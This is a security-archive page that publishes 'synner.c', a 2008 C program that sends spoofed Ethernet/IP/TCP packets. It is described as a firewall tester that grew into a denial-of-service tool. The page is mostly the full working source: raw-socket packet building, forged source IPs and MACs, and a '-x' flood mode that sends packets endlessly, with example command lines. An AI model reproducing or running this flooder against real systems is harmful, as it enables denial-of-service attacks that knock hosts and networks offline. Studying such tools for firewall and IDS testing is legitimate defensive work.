what you don't know can hurt you

synner.c

synner.c
Posted Sep 10, 2008
Authored by sm4x

Synner is a custom eth->ip->tcp packet generator (spoofer) for testing firewalls and dos attacks. It is capable of sending large amounts of prebuilt tcp packets (very quickly) with user defined ips, macs, tcp flags, window sizes, payload lengths and more.

tags | tool, scanner, tcp
systems | unix
MD5 | 30da5cf59aa9906478c1d041d92c6efe

synner.c

Change Mirror Download
/*
sm4x - 2008
"synner.c" linux/x86
- part of my personal toolchain - released public ;)
- synner is able to send mass amounts of spoofed (mac/ip) eth->ip->tcp packets with user defined:
- source ips, tcp flags, window sizes, payload sizes, sequences ids, ack ids
- developed as a quick internal firewall/IDS testing prog but soon mutated into a full featured dos attack program.as during
testing I found it to literally destroy some of my fbsd/linux/openSol/win2k8 boxes at work
- many bugs are present so feel free to fix and/or comment...
v1.1 enjoy ;)
*/

#include <stdio.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/socket.h>

#include <netinet/ip.h>
#include <netinet/in.h>
//#include <netinet/tcp.h>

#include <net/if.h>
#include <net/ethernet.h>
#include <linux/if_packet.h>

#include <time.h>
#include <unistd.h>
#include <signal.h>

/* tcp hdr */
struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned char len;
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int16_t fin:1;
u_int16_t syn:1;
u_int16_t rst:1;
u_int16_t psh:1;
u_int16_t ack:1;
u_int16_t urg:1;
u_int16_t res2:2;
# elif __BYTE_ORDER == __BIG_ENDIAN
u_int16_t res2:2;
u_int16_t urg:1;
u_int16_t ack:1;
u_int16_t psh:1;
u_int16_t rst:1;
u_int16_t syn:1;
u_int16_t fin:1;
# else
# error "Adjust your <bits/endian.h> defines"
# endif
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};

unsigned short calc_checksum(unsigned char *, int );
int count = 0;

/***********************************************************
* signalHandler
***********************************************************/
void signalHandler(int signal) {
time_t raw_t;
struct tm *timeinfo; char date[64];
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64); strftime(date, 63, "%c", timeinfo);
printf("\n[+] PUNT!\n");
printf("[+] [%s] Sent %d packets.\n", date, count);
cleanup:
exit(0);
}

/**********************************************************
* usage
***********************************************************/
void usage() {
printf("[+] Usage:\n");
printf("[+] ./synner -i<iface> -s<IP> -S<MAC> -d<IP> -D<MAC> <options>\n");
printf("[+] -i\tinterface name\n");
printf("[+] -x\twhile(1) !! dos attack mode\n");
printf("[+] \t\t-amount of packets (ie: -x10000, -x0 for infinite)\n");
printf("[+] -s\tsource ip (spoofed)\n");
printf("[+] \t\t-(r)andom source ip\n");
printf("[+] -S\tsource MAC (spoofed)\n");
printf("[+] -d\tdest ip\n");
printf("[+] -D\tdest MAC\n");
printf("[+] -u\tsource port\n");
printf("[+] -p\tdest port\n");
printf("[+] -l\tpayload length (packet size filled with \\x00)\n");
printf("[+] -w\twindow size (<=65535)\n");
printf("[+] -f\tflags (s,a:p:u,r:f)\n");
printf("[+] \t\t-(s)yn, (a)ck, (p)push, (u)rgent, (r)eset, (f)in, (x)=ALL\n");
printf("[+] eg:\n");
printf("[+] ./synner -ieth0 -x -s192.168.1.1 -S00:AA:BB:CC:00:00 -d192.168.1.219 -D00:dd:ee:aa:dd:bb -p 6984 -l 512 -u5555 -fas\n");
printf("[+] ./synner -ieth0 -sr -S00:dd:ee:aa:dd:ff -d192.168.1.219 -D00:dd:ee:aa:dd:bb -p80 -u500 -fx\n\n");
exit(0);
}

/**********************************************************
* main
***********************************************************/
int main(int argc, char **argv) {
int bytes_sent = 0; int err = 0; int sock = 0; int ok_count = 0; int iface_num = 0; int packet_count = 0;
int dst_port = 666; int src_port = 2048; int is_verbose = 0; int payload_len = 32;
int window_len = 1024; int dos_mode = 0; int use_random_source_ip = 0; int use_random_source_mac = 0;
int flag_syn = 0; int flag_ack = 0; int flag_push = 0; int flag_urg = 0; int flag_rst = 0; int flag_fin = 0;

time_t raw_t;
struct tm *timeinfo;
struct sockaddr_ll sa;
struct ether_header eth_hdr;
struct iphdr ip_hdr;
struct tcphdr tcp_hdr;

char date[64]; char random_ips[1000*16];
char *iface = NULL; char *flgs = NULL;
char *src_ip = NULL; char *dest_ip = NULL;
char *src_mac = NULL; char *dest_mac = NULL;

if(getuid()) { printf("[-] Sorry d00d - gotta be r00t.\n"); return -1; }
printf("[+] synner by sm4x -> b0h!i!i\n");

if(signal(SIGINT, signalHandler) == SIG_IGN) {
printf("[+] Signal handlers are attached..\n");
signal (SIGINT, SIG_IGN);
}

// little big gross but it was written really REALLY fast ;)
opterr = 0; int option = 1;
while((option = getopt(argc, argv, "vi:x:s:S:d:D:u:p:l:w:f:?")) != -1 ) {
switch(option) {
case 'i':
iface = optarg;
printf("[+] Using: %s ", iface);
if(if_nametoindex(iface) == 0) { printf(" => INTERFACE NO GOOD!!\n"); exit(1); }
printf("OK.\n"); ok_count++;

break;
case 'x':
dos_mode = 1;
char *c = optarg;
if(c != NULL && atoi(c) > 0) {
packet_count = atoi(c);
printf("[+] Warning - DOS mode active (%d packets)!\n", packet_count);
} else {
printf("[+] Warning - DOS mode active!\n");
}
break;
case 's':
src_ip = optarg;
//printf("OPTARG: %s\n", src_ip);
if(src_ip[0] == 'r') {
printf("[+] Using random source IP(s)\n");
use_random_source_ip = 1;
} else {
printf("[+] Source IP: %s\n", src_ip);
} ok_count++;
break;
case 'S':
src_mac = optarg;
if(src_mac[0] == 'r') {
printf("[+] Using random source MAC(s)\n");
use_random_source_mac = 1;
} else {
printf("[+] Source MAC: %s\n", src_mac);
} ok_count++;
break;
case 'd':
dest_ip = optarg; ok_count++;
printf("[+] Dest IP: %s\n", dest_ip);
break;
case 'D':
dest_mac = optarg; ok_count++;
printf("[+] Dest MAC: %s\n", dest_mac);
break;
case 'p':
dst_port = atoi(optarg);
printf("[+] Dest port: %d\n", dst_port);
break;
case 'u':
src_port = atoi(optarg);
printf("[+] Source port: %d\n", src_port);
break;

case 'l':
payload_len = atoi(optarg);
printf("[+] Payload length: %d octets\n", payload_len);
break;
case 'w':
window_len = atoi(optarg);
if(window_len > 65535) { window_len = 65535; }
printf("[+] TCP Window length: %d octets\n", window_len);
break;
case 'f':
flgs = &optarg[0];
if(flgs != NULL) {
printf("[+] FLAGS: ");
while(*flgs) {
switch(*flgs) {
case 'x':
flag_syn = 1; flag_ack = 1; flag_push = 1; flag_urg = 1; flag_rst = 1; flag_fin = 1;
printf(" SYN|ACK|PSH|URG|RST|FIN");
flgs++; break;
case 's':
flag_syn = 1; printf("|SYN");
flgs++; break;
case 'a':
flag_ack = 1; printf("|ACK");
flgs++; break;
case 'p':
flag_push = 1; printf("|PSH");
flgs++; break;
case 'u':
flag_urg = 1; printf("|URG");
flgs++; break;
case 'f':
flag_fin = 1; printf("|FIN");
flgs++; break;
case 'r':
flag_rst = 1; printf("|RST");
flgs++; break;
}
} printf("\n");
} else {
printf("[+] Default: SYN/ACK flags are set!\n");
flag_syn = 1; flag_ack = 1;
}
break;
case 'v':
is_verbose = 1;
printf("[+] Vebosity is ON\n");
break;
}

}

if(ok_count < 5 || src_ip == NULL || dest_ip == NULL || src_mac == NULL || dest_mac == NULL) {
printf("[-] Invalid options supplied!\n");
usage();
}
/* define (new ??) packet */
char packet[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr ) + payload_len];

iface_num = if_nametoindex(iface);
if(iface_num == 0) { printf("[-] IFACE %s IS REPORTED DOWN -> trying anyway.!\n", iface); }

/* as raw as we can get */
sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sock < 0) { printf("[-] Unable to open a socket!?\n"); goto cleanup; }

// b/c we want high speed sendto() we need to build this before the while(1)
if(use_random_source_ip) {
memset(random_ips, 0x0, (1000*16));
int seed = time(NULL); int i = 0;
printf("[+] Generating random source IP(s)\n");
if(dos_mode) {
for(i = 0; i < 1000; i++ ) {
srand(seed+i);
int num1 = 0, num2 = 0, num3 = 0, num4 = 0;
num1 = rand()%254; num2 = rand()%254; num3 = rand()%254; num4 = rand()%254;
sprintf(random_ips+(i*16), "%d.%d.%d.%d\0", num1, num2, num3, num4);
//printf("RANDOMIP: %s\n", random_ips+(i*16));
}
} else {
int num1 = 0, num2 = 0, num3 = 0, num4 = 0;
srand(seed); num1 = rand()%254; num2 = rand()%254; num3 = rand()%254; num4 = rand()%254;
sprintf(random_ips, "%d.%d.%d.%d\0", num1, num2, num3, num4);
printf("[+] Random source IP: %s\n", random_ips);
} src_ip = random_ips;
}

if(is_verbose ==1 ) { printf("[+] Buliding payload...\n"); }
int len = sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr) + payload_len;
memset(&packet, 0x0, len);

/* raw communication */
sa.sll_family = AF_PACKET;
sa.sll_protocol = htons(ETH_P_IP);
sa.sll_ifindex = iface_num;
sa.sll_hatype = 0x0000;
sa.sll_pkttype = 0x01;
sa.sll_halen = ETH_ALEN;

memset(&eth_hdr, 0x0, sizeof(struct ether_header));

/* ethernet frame setup*/
eth_hdr.ether_type = htons(ETHERTYPE_IP);

/* copy our source and dest hosts */
if((void *)ether_aton(dest_mac) == NULL) { printf("[-] Invalid dest mac address!\n"); goto cleanup; }
if(!use_random_source_mac && (void *)ether_aton(src_mac) == NULL) { printf("[-] Invalid source mac address!\n"); goto cleanup; }

memcpy(&eth_hdr.ether_dhost, (void *)ether_aton(dest_mac), 6);
memcpy(&eth_hdr.ether_shost, (void *)ether_aton(src_mac), 6);

memset(&ip_hdr, 0x0, sizeof(struct iphdr));
memset(&tcp_hdr, 0x0, sizeof(struct tcphdr));

/* ip frame setup */
ip_hdr.ihl = 0x05;
ip_hdr.version = 0x04;
ip_hdr.id = 0x00;
ip_hdr.tot_len = htons(len);
ip_hdr.frag_off = 0x00;
ip_hdr.ttl = 0x40;
ip_hdr.protocol = 0x06;

// inet_addr broadcast returns -1 so we guard
if(use_random_source_ip == 0 && strstr(src_ip, "255.255.255.255") == NULL) {
if(inet_addr(src_ip) == -1) { printf("[-] Invalid source ip!\n"); goto cleanup; }
}
if(inet_addr(dest_ip) == -1) { printf("[-] Invalid dest ip!\n"); goto cleanup; }

ip_hdr.saddr = inet_addr(src_ip);
ip_hdr.daddr = inet_addr(dest_ip);
ip_hdr.check = (unsigned short)calc_checksum((void *)&ip_hdr, sizeof(struct iphdr));

tcp_hdr.source = htons(src_port);
tcp_hdr.dest = htons(dst_port);

/* SEQ and ACK */
tcp_hdr.seq = htonl(rand()%65535);
tcp_hdr.ack_seq = htonl(rand()%65535);

/* syn and ack flags set */
tcp_hdr.syn = flag_syn; tcp_hdr.ack = flag_ack; tcp_hdr.fin = flag_fin;
tcp_hdr.rst = flag_rst; tcp_hdr.psh = flag_push; tcp_hdr.urg = flag_urg;
//tcp_hdr.len = htons(0x80);
tcp_hdr.len = 0x80;

tcp_hdr.window = htons(window_len);

/* incorrect checksum (assumes offload)-> (make sure add pseudo header etc...) */
tcp_hdr.check = 0x00;

memcpy(packet, &eth_hdr, sizeof(struct ether_header));
memcpy(packet+sizeof(struct ether_header), &ip_hdr, sizeof(struct iphdr));
memcpy(packet+sizeof(struct ether_header)+sizeof(struct iphdr), &tcp_hdr, sizeof(struct tcphdr));

if(is_verbose == 1) { printf("[+] Configuration ok!\n"); }
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64);
strftime(date, 63, "%c", timeinfo);
printf("[+] [%s] Beginning send(s) now (h0ld it y00z)...\n", date);

int eth_len = sizeof(struct ether_header);
/*send the packet(s) */
count = 0; int i = 0;
if(dos_mode) {
int seed = time(NULL);
while(1) {
/* this is really messy - ugh */
if(use_random_source_ip) {
if(i > 1000) { i = 0; }
//printf("%d) IP: %s\n", i, random_ips+(i*16));
tcp_hdr.seq = i<<4; tcp_hdr.ack_seq = i<<4; // random junk for seq/ack
ip_hdr.saddr = inet_addr(random_ips+(i*16));
ip_hdr.check = (unsigned short)calc_checksum((void *)&ip_hdr, sizeof(struct iphdr));
// should set he packet via packet offset directly
memcpy(packet+eth_len, &ip_hdr, sizeof(struct iphdr)); i++;
}

bytes_sent = sendto(sock, packet, len, 0, (struct sockaddr*) &sa, sizeof(sa)); count++;
if (bytes_sent < 0) { if(is_verbose) { printf("[-] (%d) Unable to send syn packet!\n", count); } usleep(100); }
if(packet_count != 0 && count >= packet_count) { goto cleanup; }
}
} else {
bytes_sent = sendto(sock, packet, len, 0, (struct sockaddr*) &sa, sizeof(sa));
if (bytes_sent < 0) { if(is_verbose) { printf("[-] (%d) Unable to send syn packet!\n", count); } goto cleanup; }
printf("[+] Sent: %d bytes\n", bytes_sent); count++;
}

/* cleanup */
cleanup:
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64);
strftime(date, 63, "%c", timeinfo);
printf("[+] [%s] Done: %d packets sent.\n", date, count);
close(sock);
return 0;
}

/**********************************************************
* checksum
**********************************************************/
unsigned short calc_checksum(unsigned char* data, int len) {
int i = 0; unsigned long sum = 0;
/* (going by 16bits) not the len of data (8 bit count from sizeof()) */
if((len & 1) == 0) { len = len >> 1; } else { len = (len >> 1) + 1; }

/* chop through the data 16bits and add to the 32 bit accumulator */
for(i = 0; i < len; i++) {
sum += *((unsigned short *)data); data += 2;
}
/* add the carries */
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (~sum);
}

// done
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    1 Files
  • 27
    Sep 27th
    1 Files
  • 28
    Sep 28th
    20 Files
  • 29
    Sep 29th
    15 Files
  • 30
    Sep 30th
    91 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close